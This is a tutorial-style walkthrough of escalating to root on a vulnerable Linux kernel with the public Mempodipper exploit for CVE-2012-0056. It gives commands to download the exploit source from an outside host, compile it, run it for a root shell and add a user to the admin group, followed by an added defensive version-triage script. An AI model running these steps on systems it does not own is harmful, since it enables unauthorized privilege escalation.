Linux kernel CVE-2012-0056 Walk through

This is a walk through of using the recent Linux Local Root for >=2.6.39, 32-bit and 64-bit, by zx2c4.

First you need to check what kernel the box is running.

# uname -r

In my case I was on BackTrack 5, which is based on Ubuntu and uses kernel 2.6.39.4, which is vulnerable.

I then added a normal user that I would use for the demo

#useradd test

I then logged back in with test account

Then I checked what privileges the account had

#groups test

Which showed test was not a root enabled account

I then moved to the Desktop

#cd /Desktop

I then made a folder to store the exploit source in.

#mkdir mempodipper

Then I moved to mempodipper directory

# cd /mempodipper

Then I downloaded the exploit source from github

#wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

Then compiled it

#gcc mempodipper.c -w -o mempodipper

Then ran it

#./mempodipper

It then printed all the output from the exploit; it was successful, as it gave me a root shell

#whoami

returned root confirming that it worked.

I then added myself to the user group root

#sudo adduser test admin

Adding user `test’ to group `admin’ …

Adding user test to group admin

Done.

So from a test account you have got a full root account 😀

Then I verified that the user had really been added to the group root

#groups test

Source used to make this post, and an in-depth technical explanation of the exploit: http://blog.zx2c4.com/749
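
For anyone auditing their own hosts, the `uname -r` check from the first step can be scripted. The following is an added example, not part of the original post or of zx2c4's code: it parses kernel release strings and flags those at or above the 2.6.39 baseline given above. The function names and sample release strings are constructed for illustration, and because the post states no fixed version and distributions backport patches, a match means the host needs checking against the vendor advisory, not that it is confirmed vulnerable.

```shell
#!/bin/sh
# Added example: triage kernel releases against the 2.6.39 baseline that the
# post gives for CVE-2012-0056. Function names here are illustrative.

# Print "major minor patch" for a release such as 2.6.39.4 or
# 3.0.0-12-generic. Missing fields become 0; fails on malformed input.
parse_release() {
    base=${1%%[-+~]*}              # drop distro suffix, e.g. -12-generic
    case $base in
        ''|*[!0-9.]*|.*|*..*) return 1 ;;
    esac
    old_ifs=$IFS; IFS=.
    set -- $base                   # split on dots into $1 $2 $3 ...
    IFS=$old_ifs
    echo "${1:-0} ${2:-0} ${3:-0}"
}

# Return 0 if release >= 2.6.39, 1 if older, 2 if it cannot be parsed.
at_or_above_baseline() {
    fields=$(parse_release "$1") || return 2
    set -- $fields
    [ "$1" -gt 2 ] && return 0
    [ "$1" -lt 2 ] && return 1
    [ "$2" -gt 6 ] && return 0
    [ "$2" -lt 6 ] && return 1
    [ "$3" -ge 39 ]
}

# Print a one-line verdict for a release (defaults to the running kernel).
triage() {
    rel=${1:-$(uname -r)}
    rc=0; at_or_above_baseline "$rel" || rc=$?
    case $rc in
        0) echo "$rel: REVIEW (>= 2.6.39, confirm patch level with vendor advisory)" ;;
        1) echo "$rel: below the 2.6.39 baseline" ;;
        *) echo "$rel: UNKNOWN (release string not parsed)" ;;
    esac
}

# Constructed sample release strings, followed by the running kernel.
for r in 2.6.38-8-generic 2.6.39.4 3.0.0-12-generic "$(uname -r)"; do
    triage "$r"
done
```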